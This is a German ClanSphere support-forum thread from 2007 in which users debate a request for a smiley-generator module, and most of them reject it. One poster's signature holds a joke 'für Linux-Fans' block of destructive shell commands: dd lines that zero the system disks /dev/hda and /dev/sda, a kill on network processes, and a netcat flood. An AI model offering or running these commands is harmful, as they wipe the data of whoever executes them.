Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 12
Seite [1]
Birnenbaum


Rock the board




Beiträge: 98
# Thema - 31.07.2007 um 15:03 Uhr
Also wollte mal fragen ob es möglich wäre so eine Art Smiliegenerator zu machen.
Also grad so 3-6 Smilies mit Schild und jeder Benuttzer kann einen Individuellen Text einfügen?

So ähnlich wie Hier! http://www.smiliemania.de/frames.php?contentUrl=http%3A//www.smiliemania.de/php/sg/smiliecreator.php
Inaktiv
Ansager


Going for pro





Beiträge: 413
# Antwort: 1 - 31.07.2007 um 16:33 Uhr
wär auch dafür!


------------------


Inaktiv
|
fay-pain


Specialist




Beiträge: 2006
# Antwort: 2 - 31.07.2007 um 22:01 Uhr
Mhh versteh ich zwar gerade nicht...
...da hast du doch einen Generator und warum brauchst
du jetzt ein Modul?
Oder verstehe ich das jetzt falsch?


------------------
Manchmal hast du fay und machmal pain.
- hajo

Inaktiv
|
Terminator


Rock the board




Herkunft: Dresden
Beiträge: 74
# Antwort: 3 - 31.07.2007 um 22:02 Uhr
Er meint bestimmt, das jeder User das direkt auf der HP machen kann und dann direkt im Forum oder in Shoutbox setzen kann.


------------------
Rechtschreibfehler sind beabsichtigt und dienen der Belustigung der Leser

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 31.07.2007 um 23:03 Uhr
Ganz ehrlich?

Schwachsinning wie ich finde!


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Mimi


Try to beat me




Beiträge: 182
# Antwort: 5 - 01.08.2007 um 00:08 Uhr
Ganz ehrlich?

Schwachsinning wie ich finde!


absolut

was soll den das für ein sinn & zweck haben?

wer nen Smily will der kann ihn selber machen oder mit dem von dir oben

gepostetten Generator erstellen und einfügen


Inaktiv
|
Birnenbaum
Thread-Ersteller


Rock the board




Beiträge: 98
# Antwort: 6 - 01.08.2007 um 01:33 Uhr
Dachte eigentlich das man seine Aktivität auf ein Browserfenster beschränkt und nicht für ein Smilie erneut rumsucht! War ein Vorschlag wenn er aber keine Interessenten findet....dann soll es so sein...


Inaktiv
|
Ho.B


King for a day



Herkunft: Berlin
Beiträge: 207
# Antwort: 7 - 01.08.2007 um 01:47 Uhr
dürfte nicht allzuschwer sein, wenn man den code für den smileygenerator bekommen würde...

aber wieso sollten die den bereitstellen, und ich hätt trotzdem keine lust drauf das zu machen

aber ich find die seite ganz lustig



------------------
Alle Angaben sind wie immer ohne Gewähr

Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 8 - 01.08.2007 um 02:42 Uhr
Wegen AUGENKREBS editiert. Wer es sich antun will hier klicken! +-


------------------
www.laszlokorte.de

Zuletzt editiert von pHaeno* ClanSphere Team am 01.08.2007 um 05:11 Uhr (1x Editiert)
Inaktiv
|
Birnenbaum
Thread-Ersteller


Rock the board




Beiträge: 98
# Antwort: 9 - 01.08.2007 um 03:57 Uhr
Aber ich merke das es euch doch ein wenig gefällt


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 10 - 01.08.2007 um 04:00 Uhr
der generator selbst is ja auch ganz witzig, aber ihn in cs einzubauen halte ich für sinnlos.
du kannst dir ja n paar smilys erstellen und die dann zu den smilys als auswahl hinzufügen


------------------
www.laszlokorte.de

Inaktiv
|
Mr.AndersoN


Going for pro




Herkunft: Dresden
Beiträge: 529
# Antwort: 11 - 01.08.2007 um 04:06 Uhr
Für einen sinnvollen Einbau in ClanSphere müsste man allen Benutzern, die Kommentare verfassen dürfen, Zugriff auf den ABCode gewähren - und das halte ich für eine sehr schlechte Idee.

Ganz nebenbei finde ich die Smileys an sich mehr als sinnfrei.
Die Smileys, die standardmäßig in ClanSphere vorhanden sind, sollten für eine ausreichende visuelle Emotionsvermittlung reichen.


------------------
ClanSphere - professional clan care starts here






Zuletzt editiert von Mr.AndersoN am 01.08.2007 um 04:06 Uhr (1x Editiert)
Inaktiv
|
taM*


Geekboy




Beiträge: 1055
# Antwort: 12 - 05.08.2007 um 13:43 Uhr
finde es auch sinnlos, dann macht man sich eine minute mehr arbeit und erstellt ihn dort auf der seite und fügt ihn ein...


Inaktiv
|
Antworten: 12
Seite [1]


Sie müssen sich registrieren, um zu antworten.